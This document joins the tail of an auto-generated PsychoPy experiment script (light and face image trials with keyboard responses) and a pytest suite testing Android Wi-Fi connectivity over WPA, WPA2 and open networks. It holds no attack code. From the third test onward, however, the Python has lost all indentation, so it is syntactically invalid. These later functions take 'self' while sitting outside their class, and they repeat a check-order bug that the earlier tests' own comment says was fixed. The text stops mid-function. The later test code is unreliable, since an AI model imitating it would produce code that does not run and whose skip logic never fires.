    if tip_1.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        tip_1.frameNStart = frameN  # exact frame index
        tip_1.tStart = t  # local t and not account for scr refresh
        tip_1.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(tip_1, 'tStartRefresh')  # time at next scr refresh
        tip_1.setAutoDraw(True)

    # *key_resp_5* updates
    waitOnFlip = False
    if key_resp_5.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        key_resp_5.frameNStart = frameN  # exact frame index
        key_resp_5.tStart = t  # local t and not account for scr refresh
        key_resp_5.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(key_resp_5, 'tStartRefresh')  # time at next scr refresh
        key_resp_5.status = STARTED
        # keyboard checking is just starting
        waitOnFlip = True
        win.callOnFlip(key_resp_5.clock.reset)  # t=0 on next screen flip
        win.callOnFlip(key_resp_5.clearEvents, eventType='keyboard')  # clear events on next screen flip
    if key_resp_5.status == STARTED and not waitOnFlip:
        theseKeys = key_resp_5.getKeys(keyList=['space'], waitRelease=False)
        _key_resp_5_allKeys.extend(theseKeys)
        if len(_key_resp_5_allKeys):
            key_resp_5.keys = _key_resp_5_allKeys[-1].name  # just the last key pressed
            key_resp_5.rt = _key_resp_5_allKeys[-1].rt
            # a response ends the routine
            continueRoutine = False

    # check for quit (typically the Esc key)
    if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
        core.quit()

    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in tip1Components:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished

    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "tip1"-------
for thisComponent in tip1Components:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
thisExp.addData('tip_1.started', tip_1.tStartRefresh)
thisExp.addData('tip_1.stopped', tip_1.tStopRefresh)
# the Routine "tip1" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
loop_light2 = data.TrialHandler(nReps=12, method='random',
    extraInfo=expInfo, originPath=-1,
    trialList=data.importConditions('documents\\light.xlsx'),
    seed=None, name='loop_light2')
thisExp.addLoop(loop_light2)  # add the loop to the experiment
thisLoop_light2 = loop_light2.trialList[0]  # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisLoop_light2.rgb)
if thisLoop_light2 != None:
    for paramName in thisLoop_light2:
        exec('{} = thisLoop_light2[paramName]'.format(paramName))

for thisLoop_light2 in loop_light2:
    currentLoop = loop_light2
    # abbreviate parameter names if possible (e.g. rgb = thisLoop_light2.rgb)
    if thisLoop_light2 != None:
        for paramName in thisLoop_light2:
            exec('{} = thisLoop_light2[paramName]'.format(paramName))
    # ------Prepare to start Routine "light"-------
    continueRoutine = True
    routineTimer.add(2.400000)
    # update component parameters for each repeat
    image.setImage(path1)
    key_resp_light.keys = []
    key_resp_light.rt = []
    _key_resp_light_allKeys = []
    # keep track of which components have finished
    lightComponents = [concentration, image, key_resp_light]
    for thisComponent in lightComponents:
        thisComponent.tStart = None
        thisComponent.tStop = None
        thisComponent.tStartRefresh = None
        thisComponent.tStopRefresh = None
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED
    # reset timers
    t = 0
    _timeToFirstFrame = win.getFutureFlipTime(clock="now")
    lightClock.reset(-_timeToFirstFrame)  # t0 is time of first possible flip
    frameN = -1
    # -------Run Routine "light"-------
    while continueRoutine and routineTimer.getTime() > 0:
        # get current time
        t = lightClock.getTime()
        tThisFlip = win.getFutureFlipTime(clock=lightClock)
        tThisFlipGlobal = win.getFutureFlipTime(clock=None)
        frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
        # update/draw components on each frame

        # *concentration* updates
        if concentration.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
            # keep track of start time/frame for later
            concentration.frameNStart = frameN  # exact frame index
            concentration.tStart = t  # local t and not account for scr refresh
            concentration.tStartRefresh = tThisFlipGlobal  # on global time
            win.timeOnFlip(concentration, 'tStartRefresh')  # time at next scr refresh
            concentration.setAutoDraw(True)
        if concentration.status == STARTED:
            # is it time to stop? (based on global clock, using actual start)
            if tThisFlipGlobal > concentration.tStartRefresh + 0.4-frameTolerance:
                # keep track of stop time/frame for later
                concentration.tStop = t  # not accounting for scr refresh
                concentration.frameNStop = frameN  # exact frame index
                win.timeOnFlip(concentration, 'tStopRefresh')  # time at next scr refresh
                concentration.setAutoDraw(False)

        # *image* updates
        if image.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
            # keep track of start time/frame for later
            image.frameNStart = frameN  # exact frame index
            image.tStart = t  # local t and not account for scr refresh
            image.tStartRefresh = tThisFlipGlobal  # on global time
            win.timeOnFlip(image, 'tStartRefresh')  # time at next scr refresh
            image.setAutoDraw(True)
        if image.status == STARTED:
            # is it time to stop? (based on global clock, using actual start)
            if tThisFlipGlobal > image.tStartRefresh + 2-frameTolerance:
                # keep track of stop time/frame for later
                image.tStop = t  # not accounting for scr refresh
                image.frameNStop = frameN  # exact frame index
                win.timeOnFlip(image, 'tStopRefresh')  # time at next scr refresh
                image.setAutoDraw(False)

        # *key_resp_light* updates
        waitOnFlip = False
        if key_resp_light.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
            # keep track of start time/frame for later
            key_resp_light.frameNStart = frameN  # exact frame index
            key_resp_light.tStart = t  # local t and not account for scr refresh
            key_resp_light.tStartRefresh = tThisFlipGlobal  # on global time
            win.timeOnFlip(key_resp_light, 'tStartRefresh')  # time at next scr refresh
            key_resp_light.status = STARTED
            # keyboard checking is just starting
            waitOnFlip = True
            win.callOnFlip(key_resp_light.clock.reset)  # t=0 on next screen flip
            win.callOnFlip(key_resp_light.clearEvents, eventType='keyboard')  # clear events on next screen flip
        if key_resp_light.status == STARTED:
            # is it time to stop? (based on global clock, using actual start)
            if tThisFlipGlobal > key_resp_light.tStartRefresh + 2-frameTolerance:
                # keep track of stop time/frame for later
                key_resp_light.tStop = t  # not accounting for scr refresh
                key_resp_light.frameNStop = frameN  # exact frame index
                win.timeOnFlip(key_resp_light, 'tStopRefresh')  # time at next scr refresh
                key_resp_light.status = FINISHED
        if key_resp_light.status == STARTED and not waitOnFlip:
            theseKeys = key_resp_light.getKeys(keyList=['space'], waitRelease=False)
            _key_resp_light_allKeys.extend(theseKeys)
            if len(_key_resp_light_allKeys):
                key_resp_light.keys = _key_resp_light_allKeys[-1].name  # just the last key pressed
                key_resp_light.rt = _key_resp_light_allKeys[-1].rt
                # was this correct?
                if (key_resp_light.keys == str(path1_corr)) or (key_resp_light.keys == path1_corr):
                    key_resp_light.corr = 1
                else:
                    key_resp_light.corr = 0
                # a response ends the routine
                continueRoutine = False

        # check for quit (typically the Esc key)
        if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
            core.quit()

        # check if all components have finished
        if not continueRoutine:  # a component has requested a forced-end of Routine
            break
        continueRoutine = False  # will revert to True if at least one component still running
        for thisComponent in lightComponents:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break  # at least one component has not yet finished

        # refresh the screen
        if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
            win.flip()
    # -------Ending Routine "light"-------
    for thisComponent in lightComponents:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    loop_light2.addData('concentration.started', concentration.tStartRefresh)
    loop_light2.addData('concentration.stopped', concentration.tStopRefresh)
    loop_light2.addData('image.started', image.tStartRefresh)
    loop_light2.addData('image.stopped', image.tStopRefresh)
    # check responses
    if key_resp_light.keys in ['', [], None]:  # No response was made
        key_resp_light.keys = None
        # was no response the correct answer?!
        if str(path1_corr).lower() == 'none':
            key_resp_light.corr = 1  # correct non-response
        else:
            key_resp_light.corr = 0  # failed to respond (incorrectly)
    # store data for loop_light2 (TrialHandler)
    loop_light2.addData('key_resp_light.keys', key_resp_light.keys)
    loop_light2.addData('key_resp_light.corr', key_resp_light.corr)
    if key_resp_light.keys != None:  # we had a response
        loop_light2.addData('key_resp_light.rt', key_resp_light.rt)
    loop_light2.addData('key_resp_light.started', key_resp_light.tStartRefresh)
    loop_light2.addData('key_resp_light.stopped', key_resp_light.tStopRefresh)
    thisExp.nextEntry()

# completed 12 repeats of 'loop_light2'
# ------Prepare to start Routine "tip2"-------
continueRoutine = True
# update component parameters for each repeat
key_resp_7.keys = []
key_resp_7.rt = []
_key_resp_7_allKeys = []
# keep track of which components have finished
tip2Components = [tip_2, key_resp_7]
for thisComponent in tip2Components:
    thisComponent.tStart = None
    thisComponent.tStop = None
    thisComponent.tStartRefresh = None
    thisComponent.tStopRefresh = None
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
tip2Clock.reset(-_timeToFirstFrame)  # t0 is time of first possible flip
frameN = -1
# -------Run Routine "tip2"-------
while continueRoutine:
    # get current time
    t = tip2Clock.getTime()
    tThisFlip = win.getFutureFlipTime(clock=tip2Clock)
    tThisFlipGlobal = win.getFutureFlipTime(clock=None)
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # update/draw components on each frame

    # *tip_2* updates
    if tip_2.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        tip_2.frameNStart = frameN  # exact frame index
        tip_2.tStart = t  # local t and not account for scr refresh
        tip_2.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(tip_2, 'tStartRefresh')  # time at next scr refresh
        tip_2.setAutoDraw(True)

    # *key_resp_7* updates
    waitOnFlip = False
    if key_resp_7.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        key_resp_7.frameNStart = frameN  # exact frame index
        key_resp_7.tStart = t  # local t and not account for scr refresh
        key_resp_7.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(key_resp_7, 'tStartRefresh')  # time at next scr refresh
        key_resp_7.status = STARTED
        # keyboard checking is just starting
        waitOnFlip = True
        win.callOnFlip(key_resp_7.clock.reset)  # t=0 on next screen flip
        win.callOnFlip(key_resp_7.clearEvents, eventType='keyboard')  # clear events on next screen flip
    if key_resp_7.status == STARTED and not waitOnFlip:
        theseKeys = key_resp_7.getKeys(keyList=['space'], waitRelease=False)
        _key_resp_7_allKeys.extend(theseKeys)
        if len(_key_resp_7_allKeys):
            key_resp_7.keys = _key_resp_7_allKeys[-1].name  # just the last key pressed
            key_resp_7.rt = _key_resp_7_allKeys[-1].rt
            # a response ends the routine
            continueRoutine = False

    # check for quit (typically the Esc key)
    if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
        core.quit()

    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in tip2Components:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished

    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "tip2"-------
for thisComponent in tip2Components:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
thisExp.addData('tip_2.started', tip_2.tStartRefresh)
thisExp.addData('tip_2.stopped', tip_2.tStopRefresh)
# the Routine "tip2" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
loop_face2 = data.TrialHandler(nReps=2, method='random',
    extraInfo=expInfo, originPath=-1,
    trialList=data.importConditions('documents\\face.xlsx'),
    seed=None, name='loop_face2')
thisExp.addLoop(loop_face2)  # add the loop to the experiment
thisLoop_face2 = loop_face2.trialList[0]  # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisLoop_face2.rgb)
if thisLoop_face2 != None:
    for paramName in thisLoop_face2:
        exec('{} = thisLoop_face2[paramName]'.format(paramName))

for thisLoop_face2 in loop_face2:
    currentLoop = loop_face2
    # abbreviate parameter names if possible (e.g. rgb = thisLoop_face2.rgb)
    if thisLoop_face2 != None:
        for paramName in thisLoop_face2:
            exec('{} = thisLoop_face2[paramName]'.format(paramName))
    # ------Prepare to start Routine "face"-------
    continueRoutine = True
    routineTimer.add(2.400000)
    # update component parameters for each repeat
    image_2.setImage(path2)
    key_resp_face.keys = []
    key_resp_face.rt = []
    _key_resp_face_allKeys = []
    # keep track of which components have finished
    faceComponents = [concentration2, image_2, key_resp_face]
    for thisComponent in faceComponents:
        thisComponent.tStart = None
        thisComponent.tStop = None
        thisComponent.tStartRefresh = None
        thisComponent.tStopRefresh = None
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED
    # reset timers
    t = 0
    _timeToFirstFrame = win.getFutureFlipTime(clock="now")
    faceClock.reset(-_timeToFirstFrame)  # t0 is time of first possible flip
    frameN = -1
    # -------Run Routine "face"-------
    while continueRoutine and routineTimer.getTime() > 0:
        # get current time
        t = faceClock.getTime()
        tThisFlip = win.getFutureFlipTime(clock=faceClock)
        tThisFlipGlobal = win.getFutureFlipTime(clock=None)
        frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
        # update/draw components on each frame

        # *concentration2* updates
        if concentration2.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
            # keep track of start time/frame for later
            concentration2.frameNStart = frameN  # exact frame index
            concentration2.tStart = t  # local t and not account for scr refresh
            concentration2.tStartRefresh = tThisFlipGlobal  # on global time
            win.timeOnFlip(concentration2, 'tStartRefresh')  # time at next scr refresh
            concentration2.setAutoDraw(True)
        if concentration2.status == STARTED:
            # is it time to stop? (based on global clock, using actual start)
            if tThisFlipGlobal > concentration2.tStartRefresh + 0.4-frameTolerance:
                # keep track of stop time/frame for later
                concentration2.tStop = t  # not accounting for scr refresh
                concentration2.frameNStop = frameN  # exact frame index
                win.timeOnFlip(concentration2, 'tStopRefresh')  # time at next scr refresh
                concentration2.setAutoDraw(False)

        # *image_2* updates
        if image_2.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
            # keep track of start time/frame for later
            image_2.frameNStart = frameN  # exact frame index
            image_2.tStart = t  # local t and not account for scr refresh
            image_2.tStartRefresh = tThisFlipGlobal  # on global time
            win.timeOnFlip(image_2, 'tStartRefresh')  # time at next scr refresh
            image_2.setAutoDraw(True)
        if image_2.status == STARTED:
            # is it time to stop? (based on global clock, using actual start)
            if tThisFlipGlobal > image_2.tStartRefresh + 2-frameTolerance:
                # keep track of stop time/frame for later
                image_2.tStop = t  # not accounting for scr refresh
                image_2.frameNStop = frameN  # exact frame index
                win.timeOnFlip(image_2, 'tStopRefresh')  # time at next scr refresh
                image_2.setAutoDraw(False)

        # *key_resp_face* updates
        waitOnFlip = False
        if key_resp_face.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
            # keep track of start time/frame for later
            key_resp_face.frameNStart = frameN  # exact frame index
            key_resp_face.tStart = t  # local t and not account for scr refresh
            key_resp_face.tStartRefresh = tThisFlipGlobal  # on global time
            win.timeOnFlip(key_resp_face, 'tStartRefresh')  # time at next scr refresh
            key_resp_face.status = STARTED
            # keyboard checking is just starting
            waitOnFlip = True
            win.callOnFlip(key_resp_face.clock.reset)  # t=0 on next screen flip
            win.callOnFlip(key_resp_face.clearEvents, eventType='keyboard')  # clear events on next screen flip
        if key_resp_face.status == STARTED:
            # is it time to stop? (based on global clock, using actual start)
            if tThisFlipGlobal > key_resp_face.tStartRefresh + 2-frameTolerance:
                # keep track of stop time/frame for later
                key_resp_face.tStop = t  # not accounting for scr refresh
                key_resp_face.frameNStop = frameN  # exact frame index
                win.timeOnFlip(key_resp_face, 'tStopRefresh')  # time at next scr refresh
                key_resp_face.status = FINISHED
        if key_resp_face.status == STARTED and not waitOnFlip:
            theseKeys = key_resp_face.getKeys(keyList=['space'], waitRelease=False)
            _key_resp_face_allKeys.extend(theseKeys)
            if len(_key_resp_face_allKeys):
                key_resp_face.keys = _key_resp_face_allKeys[-1].name  # just the last key pressed
                key_resp_face.rt = _key_resp_face_allKeys[-1].rt
                # was this correct?
                if (key_resp_face.keys == str(path2_corr)) or (key_resp_face.keys == path2_corr):
                    key_resp_face.corr = 1
                else:
                    key_resp_face.corr = 0
                # a response ends the routine
                continueRoutine = False

        # check for quit (typically the Esc key)
        if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
            core.quit()

        # check if all components have finished
        if not continueRoutine:  # a component has requested a forced-end of Routine
            break
        continueRoutine = False  # will revert to True if at least one component still running
        for thisComponent in faceComponents:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break  # at least one component has not yet finished

        # refresh the screen
        if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
            win.flip()
    # -------Ending Routine "face"-------
    for thisComponent in faceComponents:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    loop_face2.addData('concentration2.started', concentration2.tStartRefresh)
    loop_face2.addData('concentration2.stopped', concentration2.tStopRefresh)
    loop_face2.addData('image_2.started', image_2.tStartRefresh)
    loop_face2.addData('image_2.stopped', image_2.tStopRefresh)
    # check responses
    if key_resp_face.keys in ['', [], None]:  # No response was made
        key_resp_face.keys = None
        # was no response the correct answer?!
        if str(path2_corr).lower() == 'none':
            key_resp_face.corr = 1  # correct non-response
        else:
            key_resp_face.corr = 0  # failed to respond (incorrectly)
    # store data for loop_face2 (TrialHandler)
    loop_face2.addData('key_resp_face.keys', key_resp_face.keys)
    loop_face2.addData('key_resp_face.corr', key_resp_face.corr)
    if key_resp_face.keys != None:  # we had a response
        loop_face2.addData('key_resp_face.rt', key_resp_face.rt)
    loop_face2.addData('key_resp_face.started', key_resp_face.tStartRefresh)
    loop_face2.addData('key_resp_face.stopped', key_resp_face.tStopRefresh)
    thisExp.nextEntry()

# completed 2 repeats of 'loop_face2'
# ------Prepare to start Routine "thanks"-------
continueRoutine = True
routineTimer.add(2.000000)
# update component parameters for each repeat
# keep track of which components have finished
thanksComponents = [text]
for thisComponent in thanksComponents:
    thisComponent.tStart = None
    thisComponent.tStop = None
    thisComponent.tStartRefresh = None
    thisComponent.tStopRefresh = None
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
thanksClock.reset(-_timeToFirstFrame)  # t0 is time of first possible flip
frameN = -1
# -------Run Routine "thanks"-------
while continueRoutine and routineTimer.getTime() > 0:
    # get current time
    t = thanksClock.getTime()
    tThisFlip = win.getFutureFlipTime(clock=thanksClock)
    tThisFlipGlobal = win.getFutureFlipTime(clock=None)
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # update/draw components on each frame

    # *text* updates
    if text.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
        # keep track of start time/frame for later
        text.frameNStart = frameN  # exact frame index
        text.tStart = t  # local t and not account for scr refresh
        text.tStartRefresh = tThisFlipGlobal  # on global time
        win.timeOnFlip(text, 'tStartRefresh')  # time at next scr refresh
        text.setAutoDraw(True)
    if text.status == STARTED:
        # is it time to stop? (based on global clock, using actual start)
        if tThisFlipGlobal > text.tStartRefresh + 2-frameTolerance:
            # keep track of stop time/frame for later
            text.tStop = t  # not accounting for scr refresh
            text.frameNStop = frameN  # exact frame index
            win.timeOnFlip(text, 'tStopRefresh')  # time at next scr refresh
            text.setAutoDraw(False)

    # check for quit (typically the Esc key)
    if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
        core.quit()

    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in thanksComponents:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished

    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "thanks"-------
for thisComponent in thanksComponents:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
thisExp.addData('text.started', text.tStartRefresh)
thisExp.addData('text.stopped', text.tStopRefresh)

# Flip one final time so any remaining win.callOnFlip()
# and win.timeOnFlip() tasks get executed before quitting
win.flip()

# these shouldn't be strictly necessary (should auto-save)
thisExp.saveAsWideText(filename+'.csv')
thisExp.saveAsPickle(filename)
logging.flush()
# make sure everything is closed down
thisExp.abort()  # or data files will save again on exit
win.close()
core.quit()
# --- tests/e2e/interOp/validation_of_operating_modes/nat_mode/client_connectivity_test/android/test_general_security_modes.py
# --- (repo: dutta-rohan/wlan-testing, BSD-3-Clause) ---
from logging import exception
import unittest
import warnings
from perfecto.test import TestResultFactory
import pytest
import sys
import time
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from appium import webdriver
import allure

if 'perfecto_libs' not in sys.path:
    sys.path.append(f'../libs/perfecto_libs')

pytestmark = [pytest.mark.sanity, pytest.mark.interop, pytest.mark.android, pytest.mark.interop_and,
              pytest.mark.client_connectivity, pytest.mark.interop_uc_sanity, pytest.mark.nat]

from android_lib import closeApp, set_APconnMobileDevice_android, Toggle_AirplaneMode_android, ForgetWifiConnection, openApp, \
    get_ip_address_and, verifyUploadDownloadSpeed_android, wifi_connect, wifi_disconnect_and_forget
setup_params_general = {
    "mode": "NAT",
    "ssid_modes": {
        "wpa": [{"ssid_name": "ssid_wpa_2g", "appliedRadios": ["2G"], "security_key": "something"},
                {"ssid_name": "ssid_wpa_5g", "appliedRadios": ["5G"],
                 "security_key": "something"}],
        "open": [{"ssid_name": "ssid_open_2g", "appliedRadios": ["2G"]},
                 {"ssid_name": "ssid_open_5g", "appliedRadios": ["5G"]}],
        "wpa2_personal": [
            {"ssid_name": "ssid_wpa2_2g", "appliedRadios": ["2G"], "security_key": "something"},
            {"ssid_name": "ssid_wpa2_5g", "appliedRadios": ["5G"],
             "security_key": "something"}]},
    "rf": {},
    "radius": False
}
@allure.suite(suite_name="interop sanity")
@allure.sub_suite(sub_suite_name="NAT Mode Client Connectivity : Suite-A")
@pytest.mark.InteropsuiteA
@allure.feature("NAT MODE CLIENT CONNECTIVITY")
@pytest.mark.parametrize(
    'setup_profiles',
    [setup_params_general],
    indirect=True,
    scope="class"
)
@pytest.mark.usefixtures("setup_profiles")
class TestNatModeConnectivitySuiteOne(object):
    """ Client Connect SuiteA
        pytest -m "client_connectivity and nat and InteropsuiteA"
    """
    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4536", name="WIFI-4536")
    @pytest.mark.fiveg
    @pytest.mark.wpa2_personal
    def test_ClientConnectivity_5g_WPA2_Personal_Nat(self, request, get_vif_state, get_ap_logs,
                                                     get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
        profile_data = setup_params_general["ssid_modes"]["wpa2_personal"][1]
        ssidName = profile_data["ssid_name"]
        ssidPassword = profile_data["security_key"]
        print("SSID_NAME: " + ssidName)
        print("SSID_PASS: " + ssidPassword)
        # check the VIF state before recording the SSID, otherwise the xfail can never trigger
        if ssidName not in get_vif_state:
            allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
            pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
        get_vif_state.append(ssidName)
        report = setup_perfectoMobile_android[1]
        driver = setup_perfectoMobile_android[0]
        connData = get_ToggleAirplaneMode_data

        # Set Wifi/AP Mode
        ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)

        if is_internet:
            if ip:
                text_body = "connected to " + ssidName + " (" + ip + ") with internet"
            else:
                text_body = "connected to " + ssidName + " with internet, couldn't get IP address"
            print(text_body)
            allure.attach(name="Connection Status: ", body=str(text_body))
            wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
            assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
            wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
        else:
            allure.attach(name="Connection Status: ", body=str("No Internet access"))
            assert False
    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4535", name="WIFI-4535")
    @pytest.mark.twog
    @pytest.mark.wpa2_personal
    def test_ClientConnectivity_2g_WPA2_Personal_Nat(self, request, get_vif_state, get_ap_logs,
                                                     get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
        profile_data = setup_params_general["ssid_modes"]["wpa2_personal"][0]
        ssidName = profile_data["ssid_name"]
        ssidPassword = profile_data["security_key"]
        print("SSID_NAME: " + ssidName)
        print("SSID_PASS: " + ssidPassword)
        # check the VIF state before recording the SSID, otherwise the xfail can never trigger
        if ssidName not in get_vif_state:
            allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
            pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
        get_vif_state.append(ssidName)
        report = setup_perfectoMobile_android[1]
        driver = setup_perfectoMobile_android[0]
        connData = get_ToggleAirplaneMode_data

        # Set Wifi/AP Mode
        ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)

        if is_internet:
            if ip:
                text_body = "connected to " + ssidName + " (" + ip + ") with internet"
            else:
                text_body = "connected to " + ssidName + " with internet, couldn't get IP address"
            print(text_body)
            allure.attach(name="Connection Status: ", body=str(text_body))
            wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
            assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
            wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
        else:
            allure.attach(name="Connection Status: ", body=str("No Internet access"))
            assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4534", name="WIFI-4534")
@pytest.mark.fiveg
@pytest.mark.wpa
def test_ClientConnectivity_5g_WPA_Personal_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["wpa"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4533", name="WIFI-4533")
@pytest.mark.twog
@pytest.mark.wpa
def test_ClientConnectivity_2g_WPA_Personal_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["wpa"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4531", name="WIFI-4531")
@pytest.mark.fiveg
@pytest.mark.open
def test_ClientConnectivity_5g_Open_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["open"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = "[BLANK]"
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
